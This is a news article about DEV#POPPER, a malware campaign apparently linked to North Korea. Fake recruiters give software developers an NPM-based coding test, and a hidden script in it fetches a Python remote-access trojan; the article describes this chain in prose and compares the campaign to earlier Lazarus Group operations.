Web developers are the new target of hackers, probably North Korean, who pose as recruiters and introduce RAT-type malware, which is based on the Python language, in a fake coding test.
DEV#POPPER, this is the rather cynical nickname given by researchers at Securonix Threat Research (STR) to this new malware campaign which is spread through a back door. This is called new, because it is recent. But the feint is not, and it even led the STR on the trail of North Korean hackers.
It is in fact through a false job interview that equally false recruiters lure their victims, software developers. They send them a coding task that hides a back door through which they introduce RAT malware, which relies on an obfuscated Python script. This process is reminiscent of other methods often used by the famous Lazarus Group, also from North Korea.
Similarities to other North Korean malware campaigns
DEV#POPPER could well be yet another malware campaign launched by North Korea. Without putting forward irrefutable evidence, STR researchers compared other similar past North Korean attacks.
The best known of these, called “OperationDreamJob”, was launched in 2021 by the Lazarus Group. It targets hundreds of job seekers, and with fake offers, it tries to steal their personal information and login credentials. The process is simple: hackers send phishing emails to victims that use real company names and logos.
The emails are corrupted and contain links to fake company websites on which the victims, in confidence, will communicate their personal data. The hackers will then use them to steal them. This technique also strongly resembles that used by hackers who deployed a new version of KaolinRAT, and who are related to the Lazarus Group.
Operation Dream Job is part of a set of Lazarus campaigns, as are “Operation In(ter)ception” and “Operation North Star”. Deducing that DEV#POPPER is next on the list of Lazarus Group or its North Korean soldiers was therefore self-evident.
The lure of the fake coding exercise to deploy DEV#POPPER
In most cases, cybercriminals use the vulnerable state of a country, sector or people as leverage for their traps. In the case of DEV#POPPER, they are using the jobs crisis that is happening all over the world.
In short, hackers pose as employers looking to hire software developers. During the interview, they ask candidates to download and run a coding task from a file supposedly hosted on GitHub. The downloaded file, a ZIP archive, works like Russian dolls. Inside, we find an NPM package, which includes a README.md and frontend and backend directories.
When the developer launches the NPM package, a hidden JavaScript file (“imageDetails.js”), which is located in the backend directory, is triggered. It executes “curl” commands using the Node.js process to retrieve another archive (“p.zi”) from a remote server. This new archive contains the next stage of the payload, a camouflaged Python script (“npl”) that acts as a RAT.
RAT malware is multitasking: it can stay connected constantly to control the computer, search and steal specific files, execute remote commands to cause more damage, or install other malware. It can even steal data directly from important folders and monitor what the user is typing on their keyboard to steal their personal information.
The professional sector of software developers is very competitive and puts job seekers under tension, which therefore makes them vulnerable. According to STR researchers, the fake recruitment scam is very effective because it exploits the developer’s trust when applying for a job. Refusing to do what the recruiter asks could jeopardize the job opportunity. Formidably effective.
Sources: Bleeping Computer, Securonix
0